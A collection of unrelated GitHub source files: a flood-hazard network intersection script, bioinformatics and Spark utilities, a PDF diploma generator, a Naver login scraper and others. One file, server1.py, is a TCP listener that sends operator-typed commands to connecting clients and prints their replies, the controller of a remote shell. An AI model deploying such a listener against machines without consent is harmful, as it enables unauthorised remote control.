Shapefiles of network-hazard intersections results with attributes:\n - edge_id or node_id - String/Integer/Float Edge ID or Node ID of network\n - length - Float length of edge intersecting with hazards\n - geometry - Shapely geometry of edges as LineString or nodes as Points\n\n3. Shapefile of administrative boundaries of Argentina with attributes:\n - province_i - String/Integer ID of Province\n - pro_name_e - String name of Province in English\n - district_i - String/Integer ID of District\n - dis_name_e - String name of District in English\n - commune_id - String/Integer ID of Commune\n - name_eng - String name of Commune in English\n - geometry - Shapely geometry of boundary Polygon\n\n4. Excel sheet of hazard attributes with attributes:\n - hazard_type - String name of hazard type\n - model - String name of hazard model\n - year - String name of hazard year\n - climate_scenario - String name of hazard scenario\n - probability - Float/String value of hazard probability\n - band_num - Integer value of hazard band\n - min_val - Integer value of minimum value of hazard threshold\n - max_val - Integer value of maximum value of hazard threshold\n\nResults\n-------\n\n1. Excel sheet of network-hazard-boundary intersection with attributes:\n - edge_id/node_id - String name of intersecting edge ID or node ID\n - length - Float length of intersection of edge LineString and hazard Polygon: Only for edges\n - province_id - String/Integer ID of Province\n - province_name - String name of Province in English\n - district_id - String/Integer ID of District\n - district_name - String name of District in English\n - commune_id - String/Integer ID of Commune\n - commune_name - String name of Commune in English\n - sector - String name of transport mode\n - hazard_type - String name of hazard type\n - model - String name of hazard model\n - year - String name of hazard year\n - climate_scenario - String name of hazard scenario\n - probability - Float/String value of hazard probability\n - band_num - Integer value of hazard band\n - min_val - Integer value of minimum value of hazard threshold\n - max_val - Integer value of maximum value of hazard threshold\n\n\"\"\"\nimport itertools\nimport os\nimport sys\n\nimport geopandas as gpd\nimport pandas as pd\nfrom shapely.geometry import Polygon\nfrom tqdm import tqdm\n\n# geopy 2.x removed vincenty(); geodesic is used here as an assumed drop-in (same point args and ellipsoid names)\nfrom geopy.distance import geodesic as vincenty\n\n\ndef pairwise(iterable):\n    \"\"\"Return consecutive overlapping pairs from an iterable: (s0, s1), (s1, s2), ...\"\"\"\n    a, b = itertools.tee(iterable)\n    next(b, None)\n    return zip(a, b)\n\n\ndef extract_value_from_gdf(x, gdf_sindex, gdf, column_name):\n    \"\"\"Return column_name of the gdf row nearest to the geometry of x (assumed helper, mirroring similar nismod scripts).\"\"\"\n    return gdf.loc[list(gdf_sindex.nearest(x.geometry.bounds))[0], column_name]\n\n\ndef line_length(line, ellipsoid=\"WGS-84\"):\n    \"\"\"Length of a line in kilometers, given in geographic coordinates.\n\n    Adapted from https://gis.stackexchange.com/questions/4022/looking-for-a-pythonic-way-to-calculate-the-length-of-a-wkt-linestring#answer-115285\n\n    Args:\n        line: a shapely LineString object with WGS-84 coordinates.\n\n        ellipsoid: string name of an ellipsoid that `geopy` understands (see http://geopy.readthedocs.io/en/latest/#module-geopy.distance).\n\n    Returns:\n        Length of line in kilometers.\n    \"\"\"\n    if line.geometryType() == \"MultiLineString\":\n        return sum(line_length(segment) for segment in line)\n\n    return sum(\n        vincenty(\n            tuple(reversed(a)), tuple(reversed(b)), ellipsoid=ellipsoid\n        ).kilometers\n        for a, b in pairwise(line.coords)\n    )\n\n\ndef spatial_scenario_selection(\n    network_shapefile,\n    polygon_dataframe,\n    hazard_dictionary,\n    data_dictionary,\n    network_id_column,\n    network_type=\"nodes\",\n):\n    \"\"\"Intersect network edges/nodes and boundary Polygons to collect boundary and hazard attributes\n\n    Parameters\n    - network_shapefile - Shapefile of edge LineStrings or node Points\n    - polygon_dataframe - GeoDataFrame of boundary Polygons\n    - hazard_dictionary - 
Dictionary of hazard attributes\n    - data_dictionary - Dictionary of network-hazard-boundary intersection attributes\n    - network_type - String value -'edges' or 'nodes' - Default = 'nodes'\n    - name_province - String name of province if needed - Default = ''\n\n    Outputs\n    data_dictionary - Dictionary of network-hazard-boundary intersection attributes:\n        - edge_id/node_id - String name of intersecting edge ID or node ID\n        - length - Float length of intersection of edge LineString and hazard Polygon: Only for edges\n        - province_id - String/Integer ID of Province\n        - province_name - String name of Province in English\n        - district_id - String/Integer ID of District\n        - district_name - String name of District in English\n        - commune_id - String/Integer ID of Commune\n        - commune_name - String name of Commune in English\n        - hazard_attributes - Dictionary of all attributes from hazard dictionary\n    \"\"\"\n    line_gpd = gpd.read_file(network_shapefile)\n    poly_gpd = polygon_dataframe\n\n    if len(line_gpd.index) > 0 and len(poly_gpd.index) > 0:\n        print(network_shapefile, len(line_gpd.index), len(poly_gpd.index))\n        line_gpd.columns = map(str.lower, line_gpd.columns)\n        poly_gpd.columns = map(str.lower, poly_gpd.columns)\n\n        # create spatial index\n        poly_sindex = poly_gpd.sindex\n        for l_index, lines in line_gpd.iterrows():\n            intersected_polys = poly_gpd.iloc[\n                list(poly_sindex.intersection(lines.geometry.bounds))\n            ]\n            for p_index, poly in intersected_polys.iterrows():\n                if (\n                    lines[\"geometry\"].intersects(poly[\"geometry\"])\n                    and poly.geometry.is_valid\n                    and lines.geometry.is_valid\n                ):\n                    if network_type == \"edges\":\n                        value_dictionary = {\n                            network_id_column: lines[network_id_column],\n                            \"length\": 1000.0\n                            * line_length(\n                                lines[\"geometry\"].intersection(\n                                    poly[\"geometry\"]\n                                )\n                            ),\n                            \"province_id\": poly[\"province_id\"],\n                            \"province_name\": poly[\"province_name\"],\n                            \"department_id\": poly[\"department_id\"],\n                            \"department_name\": poly[\"department_name\"],\n                        }\n                    elif network_type == \"nodes\":\n                        value_dictionary = {\n                            network_id_column: lines[network_id_column],\n                            \"province_id\": poly[\"province_id\"],\n                            \"province_name\": poly[\"province_name\"],\n                            \"department_id\": poly[\"department_id\"],\n                            \"department_name\": poly[\"department_name\"],\n                        }\n\n                    data_dictionary.append(\n                        {**value_dictionary, **hazard_dictionary}\n                    )\n\n    del line_gpd, poly_gpd\n    return data_dictionary\n\n\ndef create_hazard_attributes_for_network(\n    intersection_dir,\n    climate_scenario,\n    year,\n    sector,\n    hazard_files,\n    hazard_df,\n    thresholds,\n    commune_shape,\n    network_id_column,\n    network_type=\"\",\n):\n    \"\"\"Extract results of network edges/nodes and hazard intersections to collect\n    network-hazard intersection attributes\n\n    - Combine with boundary Polygons to collect network-hazard-boundary intersection attributes\n    - Write final results to an Excel sheet\n\n    Parameters\n    ----------\n    intersection_dir : str\n        Path to Directory where the network-hazard shapefile results are stored\n    sector : str\n        name of transport mode\n    hazard_files : list[str]\n        names of all hazard files\n    hazard_df : pandas.DataFrame\n        hazard attributes\n    bands : list[int]\n        integer values of hazard bands\n    thresholds : list[int]\n        integer values of hazard thresholds\n    commune_shape\n        Shapefile of commune boundaries and attributes\n    network_type : str, optional\n        value -'edges' or 'nodes': Default = 'nodes'\n    name_province : str, optional\n        name of province if needed: Default = 
''\n\n Returns\n -------\n data_df : pandas.DataFrame\n network-hazard-boundary intersection attributes:\n - edge_id/node_id - String name of intersecting edge ID or node ID\n - length - Float length of intersection of edge LineString and hazard Polygon: Only for edges\n - province_id - String/Integer ID of Province\n - province_name - String name of Province in English\n - district_id - String/Integer ID of District\n - district_name - String name of District in English\n - commune_id - String/Integer ID of Commune\n - commune_name - String name of Commune in English\n - sector - String name of transport mode\n - hazard_type - String name of hazard type\n - model - String name of hazard model\n - year - String name of hazard year\n - climate_scenario - String name of hazard scenario\n - probability - Float/String value of hazard probability\n - band_num - Integer value of hazard band\n - min_val - Integer value of minimum value of hazard threshold\n - max_val - Integer value of maximum value of hazard threshold\n - length - Float length of intersection of edge LineString and hazard Polygon: Only for edges\n\n \"\"\"\n data_dict = []\n for root, dirs, files in os.walk(intersection_dir):\n for file in files:\n if file.endswith(\".shp\"):\n hazard_dict = {}\n hazard_dict[\"sector\"] = sector\n hazard_shp = os.path.join(root, file)\n hz_file = file.split(\"_\")\n hz_file = [\n hz_file[h - 1] + \"_\" + hz_file[h]\n for h in range(len(hz_file))\n if \"1in\" in hz_file[h]\n ][0]\n hazard_dict[\"hazard_type\"] = hazard_df.loc[\n hazard_df.file_name == hz_file\n ].hazard_type.values[0]\n hazard_dict[\"model\"] = hazard_df.loc[\n hazard_df.file_name == hz_file\n ].model.values[0]\n hazard_dict[\"year\"] = hazard_df.loc[\n hazard_df.file_name == hz_file\n ].year.values[0]\n hazard_dict[\"climate_scenario\"] = hazard_df.loc[\n hazard_df.file_name == hz_file\n ].climate_scenario.values[0]\n hazard_dict[\"probability\"] = hazard_df.loc[\n hazard_df.file_name == hz_file\n ].probability.values[0]\n\n hazard_thrs = [\n (thresholds[t], thresholds[t + 1])\n for t in range(len(thresholds) - 1)\n if \"{0}-{1}\".format(thresholds[t], thresholds[t + 1])\n in file\n ][0]\n hazard_dict[\"min_depth\"] = hazard_thrs[0]\n hazard_dict[\"max_depth\"] = hazard_thrs[1]\n\n data_dict = spatial_scenario_selection(\n hazard_shp,\n commune_shape,\n hazard_dict,\n data_dict,\n network_id_column,\n network_type=network_type,\n )\n\n print(\"Done with file\", file)\n\n data_df = pd.DataFrame(data_dict)\n data_df_cols = data_df.columns.values.tolist()\n if \"length\" in data_df_cols:\n selected_cols = [cols for cols in data_df_cols if cols != \"length\"]\n data_df = data_df.groupby(selected_cols)[\"length\"].sum().reset_index()\n\n return data_df\n\n\ndef main():\n \"\"\"Collect results\n\n 1. Specify the paths from where you to read and write:\n - Input data\n - Intermediate calcuations data\n - Output results\n\n 2. Supply input data and parameters\n - Names of the three Provinces - List of string types\n - Names of modes - List of strings\n - Names of output modes - List of strings\n - Names of hazard bands - List of integers\n - Names of hazard thresholds - List of integers\n - Condition 'Yes' or 'No' is the users wants to process results\n\n 3. 
Give the paths to the input data files:\n - Commune boundary and stats data shapefile\n - Hazard datasets description Excel file\n - String name of sheet in hazard datasets description Excel file\n \"\"\"\n tqdm.pandas()\n incoming_data_path = \"path/to/project/inputdata/\"\n data_path = \"path/to/project/inputdata/\"\n output_path = \"path/to/project/outputdata/\"\n\n # Supply input data and parameters\n modes = [\n \"road\",\n \"rail\",\n \"bridge\",\n \"air\",\n \"port\",\n ] # change this to your network datasets\n modes_shapefile_names = [\n \"road_edges\",\n \"rail_edges\",\n \"bridge_edges\",\n \"air_nodes\",\n \"port_nodes\",\n ] # change this to your network datasets\n point_asset_modes = [\n \"air\",\n \"port\",\n ] # change this to your network point asset datasets\n line_asset_modes = [\n \"road\",\n \"rail\",\n \"bridge\",\n ] # change this to your network line asset datasets\n modes_id_cols = [\n \"edge_id\",\n \"edge_id\",\n \"bridge_id\",\n \"node_id\",\n \"node_id\",\n ] # This should match the ID column name in your network datasets\n climate_scenarios = [\n \"historical\",\n \"rcp4p5\",\n \"rcp8p5\",\n ] # change this to GLOFRIS scenarios\n\n # We assume here that we will extract only flood outlines with depth:\n # 50cm-1m\n # 1m-2m\n # 2m-3m\n # 3m-4m\n # 4m-999m (>4m)\n # You can change this if you want to get different flood depth bands and ranges\n # Change the values in the thresholds and thresholds_label accordingly\n thresholds = [\"50cm\", \"1m\", \"2m\", \"3m\", \"4m\", \"999m\"]\n\n # Give the paths to the input data files\n # load provinces and get geometry of the right province\n print(\"* Reading provinces dataframe\")\n # change this to the name of the province shapefile for China\n province_path = os.path.join(\n incoming_data_path,\n \"admin_boundaries_and_census\",\n \"province\",\n \"province.shp\",\n )\n provinces = gpd.read_file(province_path, encoding=\"utf-8\")\n provinces = provinces.to_crs({\"init\": \"epsg:4326\"})\n # The file should have a column named 'province_id' and a column named 'province_name'\n # If these columns are given some other name then rename them as per the next line below\n # provinces.rename(columns={'OBJECTID':'province_id','nombre':'province_name'},inplace=True)\n sindex_provinces = provinces.sindex\n\n \"\"\"Assign provinces to zones\n \"\"\"\n print(\"* Reading department dataframe\")\n # change this to the name of the department shapefile for China\n # If you do not have a department level admin then skip this\n zones_path = os.path.join(\n incoming_data_path,\n \"admin_boundaries_and_census\",\n \"departaments\",\n \"Departaments.shp\",\n )\n zones = gpd.read_file(zones_path, encoding=\"utf-8\")\n zones = zones.to_crs({\"init\": \"epsg:4326\"})\n # The file should have a column named 'department_id' and a column named 'department_name'\n # If these columns are given some other name then rename them as per the next line below\n # zones.rename(columns={'OBJECTID':'department_id','Name':'department_name'},inplace=True)\n\n zones[\"geometry_centroid\"] = zones.geometry.centroid\n zones_centriods = zones[\n [\"department_id\", \"department_name\", \"geometry_centroid\"]\n ]\n zones_centriods.rename(\n columns={\"geometry_centroid\": \"geometry\"}, inplace=True\n )\n zone_matches = gpd.sjoin(\n zones_centriods,\n provinces[[\"province_id\", \"province_name\", \"geometry\"]],\n how=\"inner\",\n op=\"within\",\n ).reset_index()\n no_zones = [\n x\n for x in zones[\"department_id\"].tolist()\n if x not in 
zone_matches[\"department_id\"].tolist()\n    ]\n\n    zones.drop(\"geometry_centroid\", axis=1, inplace=True)\n    if no_zones:\n        remain_zones = zones[zones[\"department_id\"].isin(no_zones)]\n        remain_zones[\"province_name\"] = remain_zones.progress_apply(\n            lambda x: extract_value_from_gdf(\n                x, sindex_provinces, provinces, \"province_name\"\n            ),\n            axis=1,\n        )\n        remain_zones[\"province_id\"] = remain_zones.progress_apply(\n            lambda x: extract_value_from_gdf(\n                x, sindex_provinces, provinces, \"province_id\"\n            ),\n            axis=1,\n        )\n\n        zone_matches = pd.concat(\n            [zone_matches, remain_zones],\n            axis=0,\n            sort=False,\n            ignore_index=True,\n        )\n\n    zones = pd.merge(\n        zones,\n        zone_matches[[\"department_id\", \"province_id\", \"province_name\"]],\n        how=\"left\",\n        on=[\"department_id\"],\n    )\n\n    hazard_description_file = os.path.join(\n        data_path, \"flood_data\", \"GLOFRIS\", \"glofris_files.csv\"\n    ) # change this to the GLOFRIS data path and the csv file describing the data\n\n    # Specify the output files and paths to be created\n    output_dir = os.path.join(output_path, \"hazard_scenarios\")\n    if not os.path.exists(output_dir):\n        os.mkdir(output_dir)\n\n    # Read hazard datasets descriptions\n    print(\"* Reading hazard datasets descriptions\")\n    hazard_df = pd.read_csv(hazard_description_file)\n    hazard_files = hazard_df[\"file_name\"].values.tolist()\n\n    # Process national scale results\n    print(\"* Processing national scale results\")\n    years = [None] * len(climate_scenarios)  # placeholder values: the year argument is not used inside create_hazard_attributes_for_network\n    for m in range(len(modes)):\n        mode_data_df = []\n        for cl_sc in range(len(climate_scenarios)):\n            intersection_dir = os.path.join(\n                output_path,\n                \"networks_hazards_intersection_shapefiles\",\n                \"{}_hazard_intersections\".format(modes[m]),\n                climate_scenarios[cl_sc],\n            )\n\n            if modes[m] in [\"road\", \"rail\", \"bridge\"]:\n                ntype = \"edges\"\n            else:\n                ntype = \"nodes\"\n            data_df = create_hazard_attributes_for_network(\n                intersection_dir,\n                climate_scenarios[cl_sc],\n                years[cl_sc],\n                modes[m],\n                hazard_files,\n                hazard_df,\n                thresholds,\n                zones,\n                modes_id_cols[m],\n                network_type=ntype,\n            )\n\n            mode_data_df.append(data_df)\n            del data_df\n\n        mode_data_df = pd.concat(\n            mode_data_df, axis=0, sort=False, ignore_index=True\n        )\n        out_csv_path = os.path.join(\n            output_dir, \"{}_hazard_intersections.csv\".format(modes[m])\n        )  # renamed from data_path to avoid shadowing the input directory variable\n        mode_data_df.to_csv(out_csv_path, index=False, encoding=\"utf-8\")\n        del mode_data_df\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"nismod/snail","sub_path":"scripts/network_hazard_intersections/hazards_network_intersections_results_collect.py","file_name":"hazards_network_intersections_results_collect.py","file_ext":"py","file_size_in_byte":19444,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"38717580263","text":"from Bio import SeqIO\nimport os\nimport gzip\n\nclass ReadFa:\n\n\tdef __init__(self, fastq):\n\t\tself.fastq = fastq\n\n\n\tdef fa_check(self):\n\t\t# name_tuple = os.path.splitext(os.path.basename(self.bam))\n\t\tif os.path.exists(self.fastq):\n\t\t\tname_tuple = os.path.splitext(os.path.basename(self.fastq))\n\t\t\tif name_tuple[1].lower() == \".fasta\":\n\t\t\t\tprint(\"file is a FASTA file!\")\n\t\t\t\treturn False\n\t\t\telif name_tuple[1].lower() == \".fastq\":\n\t\t\t\tprint(\"file is a FASTQ file!\")\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\tprint(\"Unknown file extension!!\")\n\t\t\t\texit()\n\t\telse:\n\t\t\tprint(\"FASTQ file was not found!\")\n\t\t\treturn False\n\n\t\n\tdef count_reads(self):\n\t\ttemp = []\t\n\t\tfile = gzip.open(self.fastq,\"rt\")\n\t\tfor s 
in SeqIO.parse(file, \"fastq\"):\n\t\t\ttemp.append(s.id)\n\t\treturn len(temp)\n","repo_name":"kumarsaurabh20/Stinkbug_v2.0_popgenome","sub_path":"all_scripts/readFa.py","file_name":"readFa.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23664020156","text":"from pyspark import SparkConf, SparkContext\r\nimport collections\r\n\r\n# Configurations on Spark\r\nconf = SparkConf().setMaster(\"local\").setAppName(\"RatingsHistogram\")\r\nsc = SparkContext(conf = conf)\r\n\r\nlines = sc.textFile(\"file:///SparkCourse/ml-100k/u.data\")\r\n# Parse the data into different fields\r\nratings = lines.map(lambda x: x.split()[2])\r\n\r\n# Run some functions on the ratings\r\nresult = ratings.countByValue()\r\nsortedResults = collections.OrderedDict(sorted(result.items()))\r\nfor key, value in sortedResults.items():\r\n    print(\"%s %i\" % (key, value))\r\n","repo_name":"CharlizeY/SparkCourse","sub_path":"ratings-counter.py","file_name":"ratings-counter.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38327371553","text":"import random\n\ndef generator(text, sep, opt=None):\n\tif not isinstance(text, str) or not isinstance(sep, str):\n\t\tprint('ERROR')\n\t\treturn False\n\tstrings = text.split(sep)\n\tif opt == 'shuffle':\n\t\t# Fisher-Yates shuffle: walk from the end, swapping with a random earlier index\n\t\tfor i in range(len(strings) - 1, 0, -1):\n\t\t\tj = random.randint(0, i)\n\t\t\tstrings[i], strings[j] = strings[j], strings[i]\n\t\tprint(strings)\n\telif opt == 'unique':\n\t\tstrings_set = set(strings)\n\t\tstrings = (list(strings_set))\n\t\tprint(strings)\n\telif opt == 'ordered':\n\t\tstrings.sort()\n\telse:\n\t\tprint('ERROR')\n\t\treturn False\n\treturn strings\n\n\n# lst = generator(\"esto es es es una prueba una\", ' ', 'unique')","repo_name":"paudpr/Quantum-IBM","sub_path":"42AI_python/module01/ex03/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26155360902","text":"#!/usr/bin/env python\r\nimport socket\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n    # TCP server basato su IPv4 \r\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n    port_number = 8081\r\n\r\n    # Associa l'indirizzo IP e il numero di porta\r\n    s.bind((socket.gethostname(),port_number)) \r\n\r\n    # il numero di porta può essere compreso tra 0-65535 (di solito le porte non privilegiate sono > 1023)\r\n\r\n    s.listen(5)\r\n    print(f'listening on port {port_number} ...')\r\n    while True:\r\n        clt, adr = s.accept()\r\n\r\n        cmd = input(':> ')\r\n\r\n        clt.send(bytes( cmd ,\"utf-8\"))\r\n        print(f'sending command: {cmd}')\r\n\r\n        data = clt.recv(2048)\r\n        if data:\r\n            print(f'data received:\\n\\t {data}')\r\n","repo_name":"erma0x/Servers-n-Clients","sub_path":"server1.py","file_name":"server1.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10697329699","text":"import os\n\nfrom flask import url_for\nfrom werkzeug.utils import secure_filename\n\nfrom common import UPLOAD_PATH, ALLOWED_EXTENSIONS_IMAGES, SERVICE_URL\n\n\ndef allowed_file(filename, whitelist):\n    return '.' 
in filename and filename.rsplit('.', 1)[1] in whitelist\n\n\ndef upload_file(file, path, filename=None):\n if not filename:\n filename = file.filename\n if file and allowed_file(filename, ALLOWED_EXTENSIONS_IMAGES):\n filename = secure_filename(filename)\n file.save(os.path.join(path, filename))\n return f'{SERVICE_URL}/{path}/{filename}'\n else:\n return False\n","repo_name":"Funge-NFT-minting-guide/funge-api","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34519415561","text":"import datetime\nfrom unittest.mock import MagicMock\n\n\ndef test_schedule_emits_event(event_manager, schedule, patch_datetime_now):\n \"\"\"\n GIVEN an EventManager\n AND a callback is registered for the EVENT_EXECUTE event\n AND a Schedule that has been populated\n AND the current time is the next scheduled time\n WHEN update is called on the Schedule\n THEN the callback is called\n \"\"\"\n callback = MagicMock()\n event_manager.subscribe(schedule.EVENT_EXECUTE, callback)\n patch_datetime_now.set_now(schedule.next_time())\n schedule.update(event_manager)\n callback.assert_called_once()\n","repo_name":"brian-fouts/catfeeder","sub_path":"tests/integration/schedule/test_schedule_event.py","file_name":"test_schedule_event.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18248358763","text":"# from PyPDF2 import PdfFileWriter, PdfFileReader\n\nimport os\nimport json\n\nfrom reportlab.pdfgen import canvas\nfrom reportlab.pdfbase import pdfmetrics, ttfonts\nfrom reportlab.lib.pagesizes import A4\n\nimport unicodedata\n\nCENTER = A4[0]/2\n\nFILE_TEMPLATE = 'dist/diplom-%s.pdf'\n\nFONT_TITLE = ('OpenSans-Bold', 60)\nFONT_FESTIVAL_NAME = ('OpenSans-Bold', 45)\nFONT_PARTICIPANT_NAME = ('OpenSans-Bold', 30)\nFONT_REGULAR = ('OpenSans-Semibold', 18)\nFONT_SUBTITLE = ('OpenSans-Regular', 12)\nFONT_WORKSHOP = ('OpenSans-Bold', 24)\n\nTEXT_TITLE = ('DIPLOM', FONT_TITLE, None, A4[1] - 170)\nTEXT_FESTIVAL = ('Improtřesk 2017', FONT_FESTIVAL_NAME, None, A4[1] - 460)\nTEXT_PRESIDENT = ('Vanda Gabrielová', FONT_REGULAR, A4[0] - 50, 90, 'right')\n\nTEXT = [\n ('Česká improvizační liga', None, None, A4[1] - 100),\n TEXT_TITLE,\n ('za absolvování workshopu', None, None, A4[1] - 300),\n ('v rámci festivalu', None, None, A4[1] - 395),\n TEXT_FESTIVAL,\n TEXT_PRESIDENT,\n ('Prezidentka Improligy', FONT_SUBTITLE, A4[0] - 50, 70, 'right'),\n ('V roli lektora', FONT_SUBTITLE, A4[0] - 50, 180, 'right'),\n]\n\n\ndef strip_accents(s):\n return ''.join(c for c in unicodedata.normalize('NFD', s)\n if unicodedata.category(c) != 'Mn')\n\n\ndef get_all_texts(participant_name, workshop_name, lector_name):\n return TEXT + [\n (participant_name, FONT_PARTICIPANT_NAME, None, A4[1] - 250),\n (workshop_name, FONT_WORKSHOP, None, A4[1] - 350),\n (lector_name, FONT_REGULAR, A4[0] - 50, 200, 'right'),\n ]\n\n\ndef render_text(can, text, font=None, xarg=None, yarg=None, align='center'):\n if not font:\n font = FONT_REGULAR\n\n if not xarg:\n xarg = CENTER\n\n can.setFont(*font)\n\n if align == 'center':\n return can.drawCentredString(xarg, yarg, text)\n elif align == 'right':\n return can.drawRightString(xarg, yarg, text)\n return can.drawString(xarg, yarg, text)\n\n\ndef render_texts(can, texts):\n for text in texts:\n render_text(can, *text)\n\n\ndef generate_diploma(\n can,\n participant_name,\n 
workshop_name,\n lector_name,\n):\n can.setStrokeColorRGB(0.258, 0.258, 0.227)\n can.setFillColorRGB(0.258, 0.258, 0.227)\n can.setFont('OpenSans-Semibold', 24)\n can.drawImage(\n 'bg.jpg',\n 0,\n 0,\n A4[0],\n A4[1],\n None,\n True,\n 'c',\n )\n\n texts = get_all_texts(\n participant_name,\n workshop_name,\n lector_name,\n )\n render_texts(can, texts)\n\n title_width = can.stringWidth(TEXT_TITLE[0], *TEXT_TITLE[1]) - 10\n president_width = max(150, can.stringWidth(\n TEXT_PRESIDENT[0],\n *TEXT_PRESIDENT[1],\n ))\n text_lector = texts[-1]\n lector_width = max(150, can.stringWidth(text_lector[0], *text_lector[1]))\n top_border_top = A4[1] - 45\n\n can.setStrokeColorRGB(0.8, 0.8, 0.72)\n can.line(\n 60,\n top_border_top - 4,\n A4[0] - 60,\n top_border_top - 4,\n )\n\n can.setStrokeColorRGB(0.4, 0.4, 0.32)\n can.line(\n 60,\n top_border_top,\n A4[0] - 60,\n top_border_top,\n )\n\n title_line_top = TEXT_TITLE[3] - 31\n can.line(\n CENTER - title_width/2,\n title_line_top,\n CENTER + title_width/2,\n title_line_top,\n )\n\n festival_line_top = TEXT_FESTIVAL[3] - 39\n can.line(\n CENTER - title_width/2,\n festival_line_top,\n CENTER + title_width/2,\n festival_line_top,\n )\n\n president_line_top = TEXT_PRESIDENT[3] + 30\n can.line(\n TEXT_PRESIDENT[2] - president_width,\n president_line_top,\n TEXT_PRESIDENT[2],\n president_line_top,\n )\n\n lector_line_top = text_lector[3] + 30\n can.line(\n text_lector[2] - lector_width,\n lector_line_top,\n text_lector[2],\n lector_line_top,\n )\n\n if not participant_name and not workshop_name and not lector_name:\n empty_participant_line_start = CENTER - 130\n empty_participant_line_end = CENTER + 130\n empty_workshop_line_start = CENTER - 180\n empty_workshop_line_end = CENTER + 180\n\n can.setStrokeColorRGB(0.9, 0.9, 0.9)\n can.line(\n empty_participant_line_start,\n A4[1] - 262,\n empty_participant_line_end,\n A4[1] - 262,\n )\n can.line(\n empty_workshop_line_start,\n A4[1] - 362,\n empty_workshop_line_end,\n A4[1] - 362,\n )\n\n\npdfmetrics.registerFont(ttfonts.TTFont(\n 'OpenSans-Regular',\n './OpenSans-Regular.ttf',\n))\npdfmetrics.registerFont(ttfonts.TTFont(\n 'OpenSans-Semibold',\n './OpenSans-Semibold.ttf',\n))\npdfmetrics.registerFont(ttfonts.TTFont(\n 'OpenSans-Bold',\n './OpenSans-Bold.ttf',\n))\npdfmetrics.registerFont(ttfonts.TTFont(\n 'OpenSans-ExtraBold',\n './OpenSans-ExtraBold.ttf',\n))\n\n\ndef generate_set(data_src, dest_dir):\n with open(data_src) as json_data:\n data = json.load(json_data)\n\n if not os.path.exists(dest_dir):\n os.makedirs(dest_dir)\n\n file_name = os.path.splitext(os.path.basename(data_src))[0]\n print(':: Generating workshop %s' % file_name)\n dest_path = os.path.join(dest_dir, '%s.pdf' % file_name)\n can = canvas.Canvas(dest_path, pagesize=A4)\n\n for dato in data:\n print(\"Generating diploma for %s\" % dato.get(\n 'participant_name',\n 'Anonymous',\n ))\n generate_diploma(\n can,\n dato['participant_name'],\n dato['workshop_name'],\n dato['lector_name'],\n )\n can.showPage()\n\n can.save()\n\n\ndata_dir = 'data'\ndata_files = []\n\nfor f in os.listdir(data_dir):\n file_path = os.path.join(data_dir, f)\n if os.path.isfile(file_path):\n data_files.append(file_path)\n\n\nfor file_name in data_files:\n generate_set(file_name, 'dist')\n print('-----------')\n","repo_name":"just-paja/improtresk-diploma","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"6054933085","text":"def hansu(num):\n cnt = 0\n for i in range(1, num+1):\n if i < 100:\n cnt += 1\n else:\n arr = list(map(int, str(i)))\n if arr[0] - arr[1] == arr[1] - arr[2]:\n cnt +=1\n return cnt\n\nprint(hansu(int(input())))","repo_name":"jw3419/Problem_Bank","sub_path":"6_FUNCTION_problem/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5687258499","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport logging.handlers\nimport json\nimport getpass\nimport time\nimport datetime as dt\nimport pandas as pd\n\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\nfrom bs4 import BeautifulSoup\n\n\nlogger = logging.getLogger('scraping_main')\nlogger.setLevel(logging.DEBUG)\n\n# create file handler which logs even debug messages\nfh = logging.handlers.RotatingFileHandler('scraping_main.log', maxBytes=104857, backupCount=3)\nfh.setLevel(logging.DEBUG)\n\n# create console handler with a higher log level\nch = logging.StreamHandler()\nch.setLevel(logging.INFO)\n\n# create formatter and add it to the handlers\nformatter = logging.Formatter('%(asctime)s [%(levelname)s] %(name)s %(message)s')\nfh.setFormatter(formatter)\nch.setFormatter(formatter)\n\n# add the handler to logger\nlogger.addHandler(fh)\nlogger.addHandler(ch)\n\nnow_dt = dt.datetime.now()\n\n\ndef selenium_naver_login(naver_id, naver_pw):\n options = Options()\n options.headless = True\n driver = webdriver.Firefox(options=options)\n driver.implicitly_wait(5)\n\n # 로그인 전용 화면\n # driver.get('https://nid.naver.com/nidlogin.login?svctype=262144&url=http://m.naver.com/aside/')\n naver_url = \"http://naver.com\"\n driver.get(naver_url)\n # # 아이디와 비밀번호 입력\n # driver.find_element_by_name('id').send_keys('ggtt7')\n # driver.find_element_by_name('pw').send_keys(pword)\n # # 로그인 버튼 클릭\n # driver.find_element_by_css_selector('#frmNIDLogin > fieldset > input').click()\n login_button = driver.find_element_by_css_selector(\".link_login\")\n login_button.click()\n\n # 아이디와 비밀번호 입력\n driver.execute_script(f\"document.getElementsByName('id')[0].value='{naver_id}'\")\n driver.execute_script(f\"document.getElementsByName('pw')[0].value='{naver_pw}'\")\n # 로그인 버튼 클릭\n driver.find_element_by_css_selector(\"#frmNIDLogin > fieldset > input\").click()\n\n time.sleep(3)\n return driver\n\n\ndef scraping_board_list(driver, startdate=now_dt, enddate=now_dt, 